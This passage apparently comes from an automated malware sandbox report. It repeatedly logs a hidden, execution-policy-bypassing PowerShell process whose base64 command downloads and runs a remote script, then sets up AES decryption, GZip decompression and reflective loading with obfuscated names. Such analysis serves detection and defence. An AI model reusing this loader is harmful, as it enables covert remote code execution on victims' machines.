jZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7